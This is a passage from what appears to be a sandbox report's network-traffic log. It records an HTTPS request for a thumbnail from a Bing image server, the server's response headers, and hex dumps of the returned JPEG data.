Dec 2024 10:25:10 GMT Connection: close
2024-12-16 10:25:11 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 32 35 3a 34 35 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00 01 04 38 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:25:458C
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: 3b 2e ef f6 8f f5 a8 9e ea 59 15 a3 92 76 91 95 7f 77 1f 56 63 fd 2b 32 fa 09 e4 6f de 32 aa fd d5 f3 1b 77 f2 aa 8b 14 92 b9 35 e5 d8 92 3f 9e e6 46 0d fc 3c ba b5 37 fb 46 36 db 18 82 7d ab 1f cd 23 74 fc bd aa a3 5a 48 64 58 be d9 1a 9d b9 ff 00 59 b5 71 52 25 bd c2 47 e5 c1 72 b2 c7 b7 32 32 e5 55 7e a4 d3 76 62 d4 d2 b6 d5 23 82 d5 4f 9b bc ae 7f 79 27 e9 81 ed 55 7f b6 63 89 bc c7 2d 24 bb bf 85 7f 5a cb 48 1e 4b e4 84 b6 ef 9b 1f 2e 5a ba 8d 27 c0 ba 9e a9 a0 df 6a b6 51 41 6e ba 7c 4d 27 97 7b 9d f7 9b 7f 82 21 d4 b1 f4 ef 49 c6 11 dc a5 29 3d 8e 6e fb 52 b6 66 62 77 48 d2 7d ef e1 5a af 1e a5 3e d5 11 c0 d2 08 fe ef cb 5d 0d 97 84 7c 43 75 1e 6d 3c 39 a8 2e e5 fb d2 43 8e bf 5a e8 34 af 01 f8 b5 b4 9b c8 24 f0 e7 ef a7 89 52 ca ee 5d 48 c7 f6 37 Data Ascii: ;.YvwVc+2o2w5?F<7F6}#tZHdXYqR%Gr22U~vb#Oy'Uc-$ZHK.Z'jQAn\|M'{!I)=nRfbwH}Z>]\|Cum<9.CZ4$R]H7
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: 5a 4b 21 dc d5 6a 8b 4f 71 7b 54 d6 c7 69 75 a0 5d c7 33 61 74 f8 e1 8b 8f 2a 69 11 59 7e a7 34 5a c5 6e 63 cc fa 9e 9b 6c bf dd 59 77 6e f6 c6 38 ae 35 35 9b c7 ff 00 97 68 e3 ff 00 c7 aa 26 bd 23 70 b8 6f 2c b3 67 ee ff 00 4a 2d dd 89 5c ed 1a d7 4f fb 9f da fe 6b 37 dd 68 ed 87 e9 f2 f4 35 2c 6f a5 5a ed 12 6e 61 b8 8f f4 99 36 fe 8a 07 5a e0 ff 00 b4 b2 df ba b9 6c 37 fb 47 fc 8a 24 b8 93 a8 95 73 fd e6 53 f3 1a 77 0b 33 bf b7 d6 fc 39 6b e6 7f c4 b6 d2 59 36 fc de 65 cb b2 e7 e8 07 ff 00 5e 92 f3 c6 da 7a 33 0b 7f 0f 69 be 62 ff 00 ab 95 ad 9d d9 73 fe f1 c5 79 db 4d 25 be df 32 58 f0 df f0 1a ad 75 ae d9 26 e1 1c 4d 21 fc 76 fe 74 f9 6f d0 57 b7 53 b5 be f8 8b 73 1c 6b 1c 89 68 ac dc fc 96 11 a3 e7 b8 27 06 a2 5f 88 97 e6 df cb 89 76 af 27 6f c8 9c Data Ascii: ZK!jOq{Tiu]3at*iY~4ZnclYwn855h&#po,gJ-\Ok7h5,oZna6Zl7G$sSw39kY6e^z3ibsyM%2Xu&M!vtoWSskh'_v'o
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: 0f 99 87 6e bf e1 9a 71 90 34 72 5a e6 a7 e1 8d 36 f2 08 23 d0 f5 46 32 64 c8 d1 37 fa bf a7 ae 3e b9 ab 5f da 7a 5d d5 c7 97 a7 78 ea fa 29 a2 c1 f2 24 9e 48 fc b1 fe eb 1f 98 d7 40 ba 74 77 51 ac 43 50 f3 d9 97 7a aa f9 6e bf a1 ed 59 97 be 18 69 61 57 bb d3 2c 6e a4 eb 1b 7d c9 3f 0d c3 02 b6 52 89 9b 52 20 b6 d4 bc 46 ed 21 8b c7 13 b4 6a d8 8d 64 62 fe 66 3b 01 8e bf 5a b4 f7 de 34 7b 16 48 b5 38 f6 c8 bf 34 fe 5a 2b 60 9e e7 a5 63 dd 78 62 ce 0b c6 2e b2 5b 34 8d 95 93 69 f9 88 ff 00 68 0d a3 1d 33 57 d6 db 57 b4 5f 2d 2c d6 e9 78 dc d1 b6 fe 07 ae 0d 55 97 42 15 c9 99 7c 64 2d 5a 51 a9 e9 f7 91 2a e7 cc 6b 48 e4 55 c7 be 3e 5a c4 bc 8f c5 76 96 ab e7 f9 0a b3 b1 3e 5c 11 84 e9 c9 f9 b9 15 2c 62 ff 00 cc f2 ad 12 fb 4d 66 62 fe 6c 4d f2 36 7b 11 ff Data Ascii: nq4rZ6#F2d7>_z]x)$H@twQCPznYiaW,n}?RR F!jdbf;Z4{H84Z+`cxb.[4ih3WW_-,xUB\|d-ZQ*kHU>Zv>\,bMfblM6{
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: d9 e2 89 82 34 ac c6 dd 72 7b 01 df 1e b8 ac a5 40 d1 56 ee 77 f1 dc 22 f8 9b 50 2f 03 41 3c 52 29 59 22 52 8a a9 b3 ee 90 bf 75 b1 ce 45 51 d6 e7 d0 a6 f0 ad e6 8d 1b 6e 1a 96 66 96 59 23 f9 f1 fd f5 dd 96 2d 8e 3e 6c 67 35 ce 59 fc 45 b9 b2 f3 ed ee 7c 2f 05 e2 f2 23 f2 ae cc 4c a9 df 9c 12 f9 f5 35 99 61 e3 5b a8 b5 0f 22 5d 06 08 3e 6c b4 7f 69 25 b1 db 71 db 9a 9f 63 2e c3 f6 91 b6 e7 6f e0 db 0b 5b 2d 0f fb 3e 79 61 68 ad 64 43 6d 25 ce 19 ed f8 fb d8 ea 4f f2 1f 95 41 aa 6a 9f 61 65 d7 2d 91 63 9a fa 41 1c f2 6e 77 59 90 1d a5 40 5f ba bd 09 00 57 23 a9 78 c2 78 ef 23 95 74 18 23 17 3c 6d 92 33 1b b1 27 8e 7a 9f cb 9a ba 9a ab db f9 93 c9 a7 24 7e 7c 42 66 8e 09 37 2b 11 c6 09 3d 29 fb 27 7d 43 da 2b 59 1e 8d 26 b4 6f 63 92 d1 35 5b 98 23 46 8c f9 Data Ascii: 4r{@Vw"P/A<R)Y"RuEQnfY#->lg5YE\|/#L5a["]>li%qc.o[->yahdCm%OAjae-cAnwY@_W#xx#t#<m3'z$~\|Bf7+=)'}C+Y&oc5[#F
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: f0 4e b9 a4 e5 7d 12 1a 8b 5d 48 75 0d 2b ed d1 f3 05 cc 6b 1f 31 49 05 da 36 ec f5 3b 7a e6 9b f6 49 2d e1 58 ed b7 29 e3 e6 91 bf fa f5 47 4a 5d 5a ee f2 48 a7 b1 5b 72 df ea 19 a4 fb de a7 da b5 6e 74 dd 46 c5 52 59 ee 63 85 77 7f ad f3 03 6d 1e 85 b1 43 7c ae d7 0b 5d 5e c3 2d 74 df 10 ed 69 6e 60 9b ec ca c3 f7 ef 36 dd a8 3e bd 47 d2 b4 b4 9d 4f 4b b6 be 8a ce 39 60 69 64 c0 91 a2 6d de 58 f5 e2 99 a9 5a 19 15 6e 75 16 6b cb 18 17 3f 2c e5 db 03 fb d9 3c 01 ec 2b 2f 5c bd b2 b7 8d 9a c1 56 26 97 05 62 83 e4 da 87 95 20 af b7 6a 94 dc f4 2b e0 2a f8 8a 0d 68 4d 2c ba 65 8a c8 fb b0 b2 4b f3 2c 83 3f 7b e6 e9 9a ab 33 78 b6 2b af 32 de db ed 66 4c 6e f3 18 47 0a b7 43 b5 01 18 fa d2 db 6b 77 f1 f2 8f 1e 57 f8 9a ac 43 ad 13 fe 91 71 2e e9 17 ee aa c7 Data Ascii: N}]Hu+k1I6;zI-X)GJ]ZH[rntFRYcwmC\|]^-tin`6>GOK9`idmXZnuk?,<+/\V&b j+*hM,eK,?{3x+2fLnGCkwWCq.
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: 85 8f 59 d0 63 fb 3c 8d 8f b4 c1 23 ee 6c 77 56 e9 f9 e2 ab db ea cf 05 c3 7f 63 d9 ed 87 f8 16 58 c4 8e bf f0 20 39 ae b7 5a be b9 49 19 2d f5 38 2d 95 57 2d 6d 72 a7 cc 6f a1 39 1f a5 67 68 31 db 43 0b 5e 35 a4 91 cb 36 7c c6 93 e5 6e be 9d 3f 21 5d 0a a7 bb 79 23 9d c3 de b2 65 78 df c5 7a a4 2b 14 f1 5d c9 1b 7f cb 35 64 89 18 7d 2a b5 d5 9e 97 69 71 2c 5a aa ea 16 2c ad 85 56 8f 72 b0 ff 00 64 d7 45 6d a8 c0 8b e6 41 b9 83 71 f3 7c bf ce 9d 7f 7d 65 05 aa be a1 3c 6d 1b 30 fd dc 8b bd 7d f1 ef 53 ed 5a 76 4b ee 2b d9 ab 5e ff 00 79 ce 47 07 85 82 b1 8b 57 d4 bf ef 90 b4 c9 86 8e ac af 6f aa c8 c7 ae d9 63 dd fc ba d5 7f 17 5d 78 7a 59 96 e3 4b f3 23 97 f8 bf 85 31 f4 f5 fa 56 2c 72 a3 72 9f de f9 6b 78 a6 d5 f5 31 96 9a 1d 1f fc 24 17 70 4c a9 6b 79 Data Ascii: Yc<#lwVcX 9ZI-8-W-mro9gh1C^56\|n?!]y#exz+]5d}*iq,Z,VrdEmAq\|}e<m0}SZvK+^yGWoc]xzYK#1V,rrkx1$pLky
2024-12-16 10:25:12 UTC	16067	IN	Data Raw: 5b fe 7a 30 ff 00 0a cd be d2 ad 96 e9 92 de fa d1 e2 fe 19 19 8a b3 7d 45 35 5a 2c 1d 39 22 86 60 5e 7f f4 1a 76 f4 6d ce 36 a8 ab a9 a3 e7 ee 5d 5a 37 fb 3e 69 a4 6d 06 ef ac 72 5b 31 5f e1 59 f6 ff 00 4a 3d bd 3e e2 f6 73 ec 6a e8 91 f8 7c 78 66 e6 e0 df 41 3e b8 aa 7e c9 65 7e cf 6f 6d 9e 83 73 a8 3b fd 78 c7 a5 73 57 da 67 8a 75 25 8d 35 09 6d ae 8f 3b 6d b4 9d 5a 28 53 03 f8 44 39 5c fe 64 9a b4 fa 3e a2 ab 83 67 23 0f e1 f2 e4 0c bf a5 12 68 7a 95 c4 3f bd b4 93 6a a8 ff 00 59 86 eb d3 8a b5 89 a4 ba af bc 8f 65 3f 33 53 47 b0 b9 f2 e2 b3 bc f0 e6 a1 a7 37 0b 14 8d a7 c8 8f 27 a0 73 8c 37 a0 39 aa 7a a2 c5 65 75 89 fc f8 a3 8e 50 8d ba 07 57 64 e7 71 00 0e 30 de bc 1e d4 cb 68 75 d4 da 23 6b e8 c2 fd dd b7 2e bd 3f 1a de d0 5b c4 a7 73 cf f6 e9 16 Data Ascii: [z0}E5Z,9"`^vm6]Z7>imr[1_YJ=>sj\|xfA>~e~oms;xsWgu%5m;mZ(SD9\d>g#hz?jYe?3SG7's79zeuPWdq0hu#k.?[s
2024-12-16 10:25:12 UTC	16384	IN	Data Raw: b9 7e 1d 76 ce 05 54 b6 b4 f9 55 89 69 24 8d 77 c9 f5 24 9a 64 de 22 95 96 4f 2d e4 58 e4 52 8c ab 3e cd c0 fa ec 51 54 92 ca dc f2 d1 79 83 fd af f0 a9 33 1c 7b 7c a8 95 bf f1 da ab c7 a2 15 9f 71 2d ef b5 09 23 c4 51 49 e4 ed 09 b7 9d b8 f4 e4 f3 53 7d af 51 1b bf 7e b0 19 57 f7 9f 31 dc de 99 aa d7 12 ca 55 73 d5 7e 9b 69 89 2e 7a 36 da 99 3b 8d 2b 16 66 37 97 2c cf 3d ca c8 ec d9 66 91 77 f3 d3 bd 27 d9 e4 7f 92 49 d6 45 eb b5 a3 4d b9 1e d4 c6 79 0f 29 2a b5 47 99 77 67 7a fe 95 25 93 34 28 3e 42 d2 48 17 f8 76 8d b4 60 9e 5d a4 61 fd e6 6a 85 77 16 c0 db 9f ef 53 58 bb 36 7f f4 1a 2d 70 2e a5 fc d0 47 b2 36 5c 7f b2 b8 a8 a6 bd 92 55 c4 8f b9 5b f8 59 45 42 81 71 97 56 c7 fb b4 d7 1e 8b b7 e6 fe f5 4f 2a 01 7c d5 0b 84 8a d9 87 fb 56 c8 df cc 53 ad Data Ascii: ~vTUi$w$d"O-XR>QTy3{\|q-#QIS}Q~W1Us~i.z6;+f7,=fw'IEMy)Gwgz%4(>BHv`]ajwSX6-p.G6\U[YEBqVO\|VS
2024-12-16 10:25:12 UTC	16384	IN	Data Raw: 7f 1a 87 4c 59 db 56 9d 6e 25 59 23 54 5d bf dd 8c 93 cd 3b 08 96 e6 59 0c ca 4c 7c f4 5f e1 dd 8f 6a 6b 96 3b 8b cf e5 86 fb bf ed 7e 35 aa de 44 b0 c6 02 fe f5 54 9d ab f7 d8 76 22 b0 2d cc 90 eb 52 a5 e6 d6 12 36 6d a5 6f bb cf 50 73 d1 a9 a0 7a 16 5f cc 48 db ca 83 71 65 fb cd f2 ae 6a 3d 16 e2 79 a4 78 ae 55 56 46 62 3c b8 be 5d a3 dc f3 9c d4 b6 f2 10 b2 c6 8c ac 57 f8 7f 87 f1 a6 a4 f1 ac d8 96 26 8d f7 61 59 7e f5 51 24 d1 41 6d 24 2d 96 da 57 8f de 2f cc a4 f6 cd 42 d0 ca ab 82 ad 85 ff 00 6b d7 eb 52 22 05 dc e8 de 6c 4d cb 2a fd ec e7 ad 35 1e 74 dd 3a 7e f3 cc 5c 49 bb e6 56 c5 00 40 c2 58 9b 74 6c db bf da 50 d4 25 ec fd 4a c6 cd fe d7 cb 4e b9 60 8c cf 17 fa b6 51 f2 b7 f9 cd 3e 37 89 e3 8a 40 df 2c ad 8d df 7b 69 ef 9a 00 26 bb 90 b2 9f 9a Data Ascii: LYVn%Y#T];YL\|_jk;~5DTv"-R6moPsz_Hqej=yxUVFb<]W&aY~Q$Am$-W/BkR"lM*5t:~\IV@XtlP%JN`Q>7@,{i&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49793	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:25:12 UTC	346	OUT	GET /th?id=OADD2.10239357448970_1TNLOVSCGCA1OJSDO&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-16 10:25:13 UTC	861	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 475456 Content-Type: image/jpeg Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: DACFBD791C404B69A0B7355D9B8D7800 Ref B: EWR30EDGE1408 Ref C: 2024-12-16T10:25:13Z Date: Mon, 16 Dec 2024 10:25:13 GMT Connection: close
2024-12-16 10:25:13 UTC	3517	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 32 36 3a 31 32 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:26:128C
2024-12-16 10:25:13 UTC	8192	IN	Data Raw: 98 cf 22 f1 e5 ad 69 c9 0b f6 4d a2 a3 fb 34 87 f8 aa 79 90 72 94 15 f7 75 5a 7c 69 bb a2 fd ea ba b6 32 16 ce ea 96 1d 3e 6f 94 85 a1 c9 07 2b 29 7d 9d fb fc b5 24 36 d9 6c ec fb b5 a9 1d 94 fd d6 ad 25 a3 85 fb b5 2e 48 b5 03 2e 18 b6 7f 03 31 ab 90 db 2c 9c fc db 6a ec 56 e1 79 2b 4f db da a1 ca e5 a8 10 25 b4 4a bf 75 7f e0 54 8c 91 8e ad 52 bc 7d 85 31 90 d2 2a d6 20 75 88 ee 61 d6 a1 fb 32 3f 4a b6 b0 e6 9e b0 81 45 da 17 2a 29 2d 8c 67 e9 4e 5b 08 7f 1a b4 d1 d2 79 79 a7 cc c5 ca 88 57 4f 8f fd 9a 72 d8 47 52 ec 61 fc 74 e5 04 d1 76 3e 54 41 f6 34 1d 29 1a d4 0a b2 3d da 97 e5 a5 76 1c a8 a6 d6 ff 00 36 69 bb 00 eb 17 15 6d c6 7e 94 c7 05 7a 7f e8 54 07 2a 2b e1 47 fc b2 da d4 d7 19 fe 1a 7c 84 96 a8 5d 9f 77 3f 76 a8 86 86 ba 1f ef 35 46 c5 f7 71 Data Ascii: "iM4yruZ\|i2>o+)}$6l%.H.1,jVy+O%JuTR}1* ua2?JE)-gN[yyWOrGRatv>TA4)=v6im~zT+G\|]w?v5Fq
2024-12-16 10:25:13 UTC	4144	IN	Data Raw: 00 64 ff 00 76 91 99 d7 f8 77 53 b7 03 47 1f de a0 08 b7 b1 fe 1a 46 2f 52 b6 0f f1 50 cb 40 10 aa b9 6f bd 52 22 91 d5 b8 a5 db 4e 50 bd 68 01 57 34 fc e1 69 14 52 ed 1d a8 00 dd 46 4f e3 4b c6 ea 46 fb d5 20 0b 93 49 cf f7 68 a7 7c d4 00 8a c7 fb b4 bb 9b fb b4 bd 68 e6 80 15 0d 39 69 33 8a 32 6a 8a 1f 91 bb 06 9d 9f 96 a1 62 45 27 cf da 80 26 dc 29 be 62 8a 87 63 9a 4f 29 e9 5c 92 56 9d 07 5a 4f 3e 3f ef 54 0d 04 9d 77 53 3c 82 69 81 3b dd a0 a8 da ef d1 6a 26 b7 7e d4 7d 9e 4d bf 76 8d 03 51 df 6a 63 4b f6 87 a6 7d 96 4e fd 69 cb 6d 25 1a 00 79 ee 7a b5 0b 21 3f de a5 5b 57 a7 0b 6c 75 6a 34 01 be 65 0a f4 f5 82 31 d5 a9 c1 22 1f c7 40 10 ee 34 54 f9 84 7f 15 14 01 e6 6a a6 95 54 ee e2 9c a2 95 4b 57 b0 79 23 71 8e b4 60 1a 73 06 2a b8 a6 ed 3b b0 68 Data Ascii: dvwSGF/RP@oR"NPhW4iRFOKF Ih\|h9i32jbE'&)bcO)\VZO>?TwS<i;j&~}MvQjcK}Nim%yz!?[Wluj4e1"@4TjTKWy#q`s*;h
2024-12-16 10:25:13 UTC	8192	IN	Data Raw: 66 91 92 46 e2 dd 47 db 6d 1f 68 43 fc 55 87 e7 b9 a5 59 49 5f f5 bb 6a 3d 91 7e d4 dc f3 52 93 cd 5a c4 59 1c f1 e6 b5 4d 0a 07 eb 3d 2e 4b 02 a8 cd 4f 3a 3e bf dd a6 fd a2 01 fc 55 59 6d a0 6e b3 ee ff 00 81 54 89 67 6e 3f bc d5 36 45 de 5e 43 fe d5 06 df bd 4d 6b b8 bb 53 96 da df fb b4 2c 16 eb d1 69 7b a5 da 40 64 76 e4 45 f2 d4 4f 24 a3 a4 4c d5 63 e4 14 6e 8c 52 07 16 ca 4f 25 c0 ff 00 96 4d 51 b4 b7 1f dc 65 35 a0 f2 20 a6 34 b1 7f df 35 57 33 94 5f 72 8f 9d 2f 7d d4 be 64 bd ea c9 9e 01 fc 35 1b 4f 09 e8 b5 44 db cc 8f 79 2b 92 d4 ab 93 fc 6d 4e f3 50 d2 a1 53 d7 a5 3b 94 3e 38 41 e6 a6 54 0b b6 99 19 05 73 52 2f bd 66 f7 1a dc 92 3c 0a 7f 99 8a 87 19 a5 e7 f8 6a 59 a9 2f 9b 9a 37 54 39 6a 37 11 48 09 a8 da 86 a2 56 27 8a 5c 93 40 0d 92 de 37 ff Data Ascii: fFGmhCUYI_j=~RZYM=.KO:>UYmnTgn?6E^CMkS,i{@dvEO$LcnRO%MQe5 45W3_r/}d5ODy+mNPS;>8ATsR/f<jY/7T9j7HV'\@7
2024-12-16 10:25:13 UTC	8192	IN	Data Raw: 99 92 69 72 68 01 ea 68 cf fd f3 50 c9 34 31 ff 00 ac 95 57 fd e6 aa b3 6a d6 31 f5 9f 77 fb bf 35 35 19 3e 82 ba ee 68 6e a3 3f 2d 63 4d e2 1b 44 fb 91 49 27 e4 b5 56 4f 11 c8 fc 45 14 6b fe d3 65 aa d5 29 32 3d a4 4e 8f 3e f4 ec e2 b9 4f ed 2d 46 e2 45 09 3e dd df 77 6a ed a7 3b 34 2b e6 5d df 6d fe f7 99 3f dd a7 ec 98 7b 44 f6 3a 76 96 35 ea ca b5 1b 5e 5b 0f f9 6b bb fd da c9 d1 63 93 50 56 7b 28 a4 b9 54 5c b3 2f ca b8 f6 cd 6a 68 9a e7 85 ed 35 2f b1 df df 5b 45 2e dc ee 66 0f ed f2 81 e9 ef 59 4b 4d b5 34 5a 96 23 76 9b 68 8a 26 62 df 77 fd aa 65 c4 86 08 f7 ca d1 c6 3f da 6a c3 f1 56 b1 1a 79 e2 c3 55 9e e6 c2 5c a2 c7 07 c9 24 83 d0 b7 6a cc 45 b5 bc 8f 7b dc dc aa af 3b 27 62 cc be d9 ad 23 4d b5 76 67 2a 96 d8 dc bf d7 ad ad d7 96 56 ff 00 c7 Data Ascii: irhhP41Wj1w55>hn?-cMDI'VOEke)2=N>O-FE>wj;4+]m?{D:v5^[kcPV{(T\/jh5/[E.fYKM4Z#vh&bwe?jVyU\$jE{;'b#Mvg*V
2024-12-16 10:25:13 UTC	8192	IN	Data Raw: 16 5e 37 6e 76 75 39 e8 00 ef 51 5c 5c 4d 26 e9 7c ab 66 96 3c 9f 9b 76 70 3b 8e 69 59 b6 35 63 7a db 5e b2 5d a9 2d 9c 71 48 bf ed 70 be f5 79 75 8b 42 aa db 20 c3 7f 7b 0b 5c 62 ac 32 5b b4 f2 37 9a 59 72 d1 c7 f7 97 3d 31 df 35 35 c5 bd 85 b2 c5 2c 8c cd 1c 99 46 59 1b 6f cf 8c 80 b8 ea d8 35 9f b3 45 a9 33 b1 4d 49 4f 31 41 1b 47 fc 2c b2 0f 9b f0 a9 96 e6 e6 45 f3 12 d9 a3 ff 00 69 97 fa 57 2f 6e fa 44 3a a2 da 3c 4c ac cb b3 e7 63 b5 8e 38 c7 d4 f7 ab 57 3a c5 85 94 8b 6c 6d a7 96 e9 59 83 40 b7 25 56 1c 0e 72 fd 1b 1e 95 9b 8b e8 54 65 d5 9d 2c 6d 24 ab 92 9f f7 d5 2b a3 7f 77 ff 00 d5 58 17 1e 26 d3 45 c4 16 f1 e9 92 49 2c 71 6f 95 7c d2 ab 1f 1d 4f 4d c4 fb 54 d7 3e 2a d3 c3 2c 47 4d f3 a4 5c 09 17 71 65 5c 8c 8c 11 ed f8 d4 da 7d 8b bc 5f 53 4e Data Ascii: ^7nvu9Q\\M&\|f<vp;iY5cz^]-qHpyuB {\b2[7Yr=155,FYo5E3MIO1AG,EiW/nD:<Lc8W:lmY@%VrTe,m$+wX&EI,qo\|OMT>*,GM\qe\}_SN
2024-12-16 10:25:13 UTC	8192	IN	Data Raw: ab bf f8 23 e2 ed 71 fc 61 05 a5 e6 b9 77 2d a2 c6 4c 71 dd de 9d 8a 7b 60 13 86 3e d5 c6 df f8 57 50 8f 98 2c 6e 59 78 0a ac bf 37 3d cf 38 c5 55 b7 b1 d5 34 eb a8 fc b8 2e 63 b9 ea bb 94 7c b8 ee 33 c5 39 46 32 56 14 5b 4e e7 da 1a 7d c5 96 a0 ab 75 02 c9 1c db 55 5a 45 91 14 b7 1d 0b 73 b7 f0 15 62 e0 38 9b cb 36 cb 3b 49 b4 2c 9f 7d 94 77 e4 ff 00 3c d7 ca 1a 0f 8f 3c 77 6f 1c 88 9a f5 b4 1e 5b 65 56 58 10 f3 ed c5 6f e9 bf 18 fe 23 ac cb 1f fc 24 3a 6c a5 b8 f2 ee 74 dd ab cf bf 15 e7 4b 05 2b e8 ce b5 88 8d b5 3e 88 b8 d8 f2 32 25 e4 91 cb 16 42 f9 ab f7 b3 e8 4f 4a 89 6d f5 43 1c 8f 23 7d a6 66 c8 f3 15 bb 57 81 5c fc 69 f8 81 61 23 41 77 a7 e8 97 02 4c 6d 6f b2 3a ae 4f be 6a d5 87 c6 af 1a a4 2d e7 f8 7b 46 90 ab 1d ac b7 72 46 dd 3b 00 4e 6a 7e Data Ascii: #qaw-Lq{`>WP,nYx7=8U4.c\|39F2V[N}uUZEsb86;I,}w<<wo[eVXo#$:ltK+>2%BOJmC#}fW\ia#AwLmo:Oj-{FrF;Nj~
2024-12-16 10:25:13 UTC	8192	IN	Data Raw: bc 6d c2 ab 32 32 e3 ea a4 83 51 6a 9e 0e d4 0d bc b2 41 07 cb 0f 2b bd be 66 1d f8 a5 d3 67 d4 74 ab a6 37 1b 71 2f 1b 55 4a 2b 7e b8 fd 2b 45 af a4 8a 65 92 3b e9 23 85 97 e6 8d 9b 3b aa 39 a6 9e e5 24 ad b1 cc c3 e1 eb f1 a8 6f b2 95 a0 85 be f2 ca a1 be 7f 63 d7 14 57 4d f6 ad 39 61 59 fe d3 1a 1d df bc da a5 77 67 e9 d6 8a 3d a4 bb 07 2c 47 45 aa 36 e6 d8 b1 ae de 23 6d bd bd 32 6a 3b ad 45 dd 77 cb 7d 26 78 2d b7 0a bf 8f 06 b6 a3 b1 b7 1e 64 93 db 2b 15 6f dd ac 9b 11 57 fa d4 67 5b d2 e2 9b c8 8b 45 56 68 fe f3 48 c1 d7 f0 c6 78 f6 af 43 4e c7 16 dd 4c 24 77 95 5a 44 b9 bb 92 35 6c ed f3 c2 b3 67 b8 c0 cd 49 e4 dc 4a b2 66 09 e4 65 c2 7e f6 e5 fe e5 6e 36 b9 89 23 10 e8 ab 27 98 d8 dd 04 11 c6 aa 3d 72 c7 9f c2 ad 47 75 10 5f 33 75 b4 11 f5 6f 31 Data Ascii: m22QjA+fgt7q/UJ+~+Ee;#;9$ocWM9aYwg=,GE6#m2j;Ew}&x-d+oWg[EVhHxCNL$wZD5lgIJfe~n6#'=rGu_3uo1
2024-12-16 10:25:13 UTC	8192	IN	Data Raw: fa 37 04 fd 0d 68 ea 9e 08 bc b2 d3 59 b5 8d 5e 78 2d d7 1e 5c 4b b3 e6 7e df 77 3f ad 57 93 c4 3e 37 66 90 0f 11 e8 32 5d 4a c6 45 82 c6 09 66 68 d0 1c b0 63 f7 47 af 15 d2 be b5 e3 0d 1a ce 4d 4f 57 5d 3f 53 b5 d4 a3 c5 94 0f 72 15 e3 c7 43 e4 a2 e7 79 f5 6a 89 4e a2 ea 35 18 be 87 2f a5 fc 37 82 f3 4b 6b c9 2e 60 dc bb 84 92 dc ce 11 b7 ff 00 0f 3b 7b d4 d6 7e 12 81 a6 fe cf d1 ef 16 7f 29 b1 3c b1 b1 74 57 c7 77 c0 07 07 8a ea 1e e6 fb 55 d0 e5 bf d6 3c 20 d6 76 f1 73 b2 ee d3 7a 47 90 06 f1 82 4f e6 2b 39 bc 61 e1 75 d3 67 d0 2d ad b5 2b 5b b6 62 f6 d0 4f 3f c9 08 fe f6 c5 e3 77 a6 47 43 50 ea 54 66 8a 10 46 5c 3e 12 96 ef 4d c5 e6 b5 69 24 4b 94 db 1d e9 ec 70 06 3a 0a ca b8 f0 58 45 90 59 dd da 7d 9e 39 0c 72 5c bd df 9d c9 f4 51 d4 8f 4a e8 db c2 Data Ascii: 7hY^x-\K~w?W>7f2]JEfhcGMOW]?SrCyjN5/7Kk.`;{~)<tWwU< 